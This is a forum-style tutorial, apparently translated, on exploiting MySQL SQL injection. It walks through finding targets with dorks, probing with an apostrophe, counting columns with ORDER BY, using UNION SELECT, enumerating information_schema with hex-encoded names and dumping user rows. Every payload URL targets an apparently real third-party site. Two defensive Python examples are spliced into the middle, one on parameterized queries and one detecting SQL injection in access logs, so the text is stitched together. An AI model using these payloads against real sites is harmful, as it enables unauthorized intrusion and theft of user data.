qaqaqa
Hello
"SQL Injection" ...
This tutorial explains step by step what you need to do once you have found an SQL injection ... in my opinion one of the best tutorials on the topic of SQL injection ...
Here is the tutorial, the "pretty simple way to do an SQL injection":
1. Google Dorks
2. Beginning
3. Order By
4. Union Select, version, database
5. Tables
6. Columns
7. Data
8. Thanks for reading
1. Google Dorks
- Here are a couple of Google dorks so you can search for SQLi-vulnerable sites.
SQLi Dorks - XakNet Forum
2. Beginning
- First we look for a page that we suspect has an SQLi vulnerability.
Example:
Code:
http://modules.t-o-m-e.net/script.php?id=24
Now we simply append an apostrophe to the URL:
Code:
http://modules.t-o-m-e.net/script.php?id=24'
If an error comes back, we have found a vulnerability.
On this example page the error shows up as follows:
PHP Code:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"
3. Order By
- Now we determine the number of columns using the SQL command "order by":
The tactic works like this:
We ask the server whether the query has a certain number of columns. If NOT, the page returns an error (this means the query has FEWER columns than we asked for).
If the page returns no error, the query has that many columns or more.
For this we append the command "+order+by+number" to the vulnerable URL.
"number" stands for the column count we want to test ...
Let's test it at once an example:
Code:
http://modules.tome.net/script.php?id=24+order+by+10--
TWO MINUS SIGNS (--) ARE ALWAYS APPENDED AT THE END, IN EVERY STEP THAT FOLLOWS!
This asks whether the query has 10 columns. -> We get an error, so the query has fewer than 10 columns.
Now we just try a few values ...
Code:
http://modules.tome.net/script.php?id=24+order+by+8--
Here NO error is returned, which means the query has 8 columns (or more). Now we try the opposite case:
Code:
http://modules.tome.net/script.php?id=24+order+by+9--
We see that it returns an error. Now we know: 9 columns = NO, 8 columns = YES.
4. Union Select, version, database
- Now we have found the column count thanks to the command "order by".
Column count = 8
We now append this to the URL as well, namely the SQL command "+union+select+numbers".
"numbers" stands for the column count we determined before.
It is not written as a single number but as every number from 1 up to the maximum column count (in this case: 1,2,3,4,5,6,7,8).
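To show why the apostrophe test in step 2 and the order-by test in step 3 produce an error, here is an added example that is not part of the original tutorial: a lookup built by string concatenation (the pattern behind a vulnerable script.php?id=...) next to a hardened version that validates the parameter and binds it. It uses Python's bundled sqlite3 as a stand-in for MySQL, so the error text differs from the one quoted above; the `script` table, its rows and the helper `probe_result` are constructed for this example and are not from the page.

```python
import sqlite3

# Constructed sample table standing in for the tutorial's MySQL database.
# sqlite3 is used only because it ships with Python; the error message differs
# from MySQL's "You have an error in your SQL syntax" but the behaviour matches.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE script (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO script VALUES (?, ?)",
                     [(24, "zangband mutations (20kB)"), (25, "another script")])
    return conn

def vulnerable_lookup(conn, raw_id):
    """Builds the query by concatenation, the way a vulnerable script.php?id=... does.
    Whatever the client sends becomes part of the SQL text."""
    query = "SELECT title FROM script WHERE id=" + raw_id
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def safe_lookup(conn, raw_id):
    """Hardened form: reject anything that is not an unsigned integer, then bind
    the value as a parameter so it can never be parsed as SQL."""
    if not raw_id.isdigit():
        raise ValueError("id must be an unsigned integer")
    row = conn.execute("SELECT title FROM script WHERE id=?", (int(raw_id),)).fetchone()
    return row[0] if row else None

def probe_result(lookup, raw_id):
    """Hypothetical helper: classify what an observer sees for one input value.
    'sql-error' is the signal the tutorial's apostrophe and ORDER BY tests rely on."""
    try:
        return "row" if lookup(make_db(), raw_id) else "no-row"
    except sqlite3.Error:
        return "sql-error"
    except ValueError:
        return "rejected"

if __name__ == "__main__":
    for raw in ("24", "24'", "24 order by 1--", "24 order by 2--"):
        print(f"{raw!r:20} concatenated: {probe_result(vulnerable_lookup, raw):10}"
              f" parameterized: {probe_result(safe_lookup, raw)}")
```

With concatenation the apostrophe yields a parser error and "order by 2" on a one-column query yields an out-of-range error, which is exactly the yes/no oracle described above; with validation plus a bound parameter both inputs are rejected before any SQL is run, so there is no error-based oracle to probe.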
Let's test it on our example:
The page still shows its normal content: T.o.M.E. Library - Script 'zangband mutations (20kB)'
Now, to make the individual numbers show up on the displayed page (the page's own text usually hides them), we put a MINUS in front of the ID; this invalidates the original row:
Example:
Note the MINUS in front of the 24: "id=-24"
PHP Code:
T.o.M.E. Library - Script '2'
Instead of the number we now see on the page, we can have the MySQL version and the database displayed.
Version command: "version()"
Database command: "database()"
Now we pick a number that is visibly displayed on the page.
For this example I'll take the 2.
To read the version, we replace the "2" in the URL with the version command "version()":
Example:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1,version(),3,4,5,6,7,8--
The page now displays the following: 5.0.87
This means the MySQL version is 5.0.87.
We are only interested in the first digit of the version. If it is 4, reading the tables and columns later is harder, as we would have to guess them ourselves.
As this page has MySQL version 5, we can have the table names output automatically.
We can do the same with the database command: I go back to the "2" and replace it with the database command "database()":
Example:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1,database(),3,4,5,6,7,8--
The database name of this site is therefore: darkdb
We should now write down the database name somewhere for the next steps.
5. Tables
- Now we have the column count, the version and the database name.
If the MySQL version is 5, we can easily have the table names output automatically.
We replace our number (in this case again "2") with "group_concat(table_name)". Then we go to the END of the URL, BEFORE the two minus signs "--", and insert the following: +from+information_schema.tables+where+table_schema=0x<database hex>
"database hex" stands for the hex string of the database name:
I wrote a little program that converts the database name to a hex string.
- Simply enter the database name (in this case: darkdb) into the text box above, then copy the hex string that appears: 64:61:72:6b:64:62
We then remove the colons from the hex string and get the following string: 6461726b6462
Now let's put it all together in an example:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=0x6461726b6462--
Normally we now get several table names listed next to each other; we should write these down somewhere.
6. Columns
- Now we pick a table name whose columns we want to read:
In this example I'll take the table phpbb3acl_users -> we again have to convert it to a hex string. We do this again with the tool.
Then we remove the colons and get the following hex string: 70687062623361636c5f7573657273
Now we replace "group_concat(table_name)" with "group_concat(column_name)".
Then we replace the part from the previous step, "+from+information_schema.tables+where+table_schema=0x<database hex>", with "+from+information_schema.columns+where+table_name=0x<table hex>".
In our example it looks like this:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1,group_concat(column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x70687062623361636c5f7573657273--
Now a couple of column names are output; we should note these down again.
Suppose our example gives us the following column: user_id
Unfortunately this table contains no user_name or user_password, so I'll just take user_id.
7. Data
- Now we have a table and a column that we want to read from that table.
To output the data, we replace "group_concat(column_name)" with "concat(user_id)".
And we replace the from clause from the previous step with: "+from+database.tablename"
"database" stands for the plain name of the database, i.e. darkdb
"tablename" stands for the plain name of the table we chose, i.e. phpbb3acl_users
Now we test it on our example:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1,concat(user_id),3,4,5,6,7,8+from+darkdb.phpbb3acl_users--
The user_id of the first row is output, in this case: 7
To move up and down in such a list, we append
PHP Code:
"+limit+0,1" after "+from+darkdb.phpbb3acl_users"
It looks like this:
PHP Code:
http://modules.tome.net/script.php?id=-24+union+select+1,concat(user_id),3,4,5,6,7,8+from+darkdb.phpbb3acl_users+limit+0,1--
If we now change the 0 to 1, we move one row further and read the next user_id; set it to 2 for the one after that, and so on until at some point no further row exists.
If we want to read several columns at once, e.g. in this case forum_id and user_id,
we simply replace "concat(user_id)" with "concat(user_id,0x3a,forum_id)".
The 0x3a stands for a colon, so the user_id is separated from the forum_id by a colon.
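For defenders, the request sequence walked through above leaves a very recognisable trail in the web server's access log. The following is an added example and not part of the original post: it parses constructed access-log lines (modelled on the steps of the tutorial, not taken from any real server; the IPs are from documentation ranges), flags the apostrophe probe, ORDER BY probing, UNION SELECT, information_schema lookups and LIMIT row-walking, and decodes the 0x hex literals so an analyst can see which schema or table name was being enumerated. The indicator names and the functions analyze_log, inspect_value, decode_hex_literals and summarize are this example's own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not from a real server) mirroring the
# tutorial: quote probe, ORDER BY probing, UNION SELECT against
# information_schema with a hex-encoded schema name, then row-by-row LIMIT.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /script.php?id=24 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2010:13:55:41 +0000] "GET /script.php?id=24' HTTP/1.1" 200 612
203.0.113.5 - - [10/Oct/2010:13:55:50 +0000] "GET /script.php?id=24+order+by+10-- HTTP/1.1" 200 612
203.0.113.5 - - [10/Oct/2010:13:55:55 +0000] "GET /script.php?id=24+order+by+8-- HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2010:13:56:10 +0000] "GET /script.php?id=-24+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=0x6461726b6462-- HTTP/1.1" 200 2210
203.0.113.5 - - [10/Oct/2010:13:56:30 +0000] "GET /script.php?id=-24+union+select+1,concat(user_id),3,4,5,6,7,8+from+darkdb.phpbb3acl_users+limit+1,1-- HTTP/1.1" 200 2201
198.51.100.7 - - [10/Oct/2010:13:57:02 +0000] "GET /script.php?id=25 HTTP/1.1" 200 4980
"""

# Common log format: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\d+)')

# Ordered list so the indicator names reported for a request are deterministic.
INDICATORS = [
    ("quote_probe",    re.compile(r"'")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),
    ("union_select",   re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema_enum",    re.compile(r"\binformation_schema\.")),
    ("row_enum",       re.compile(r"\blimit\s+\d+\s*,\s*\d+")),
]
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]+)")

def decode_hex_literals(value):
    """Decode MySQL-style 0x... literals so the analyst sees the names targeted."""
    out = []
    for h in HEX_LITERAL.findall(value.lower()):
        if len(h) % 2:
            continue                      # odd length cannot be a byte string
        out.append(bytes.fromhex(h).decode("ascii", "replace"))
    return out

def inspect_value(value):
    """Return the indicator names that fire on one URL-decoded parameter value."""
    v = re.sub(r"\s+", " ", value.lower())
    return [name for name, rx in INDICATORS if rx.search(v)]

def analyze_log(text):
    """Parse each log line, decode its query parameters and keep the flagged ones."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status, size = m.groups()
        # parse_qsl turns '+' back into spaces, which restores the SQL keywords
        for param, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
            hits = inspect_value(value)
            if hits:
                findings.append({"ip": ip, "time": ts, "param": param,
                                 "indicators": hits,
                                 "decoded_hex": decode_hex_literals(value)})
    return findings

def summarize(findings):
    """Count flagged requests per source address."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], f["param"], ",".join(f["indicators"]), f["decoded_hex"])
    print(summarize(found))
```

Run stand-alone it prints one line per flagged request and the per-IP totals; the benign id=24 and id=25 requests are not reported, while the information_schema request is shown together with the decoded schema name darkdb. In practice the order matters as much as any single indicator: an apostrophe followed within a minute by a descending series of ORDER BY values from one address is the fingerprint of exactly the column-counting step described above.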
Thanks for reading
Enjoy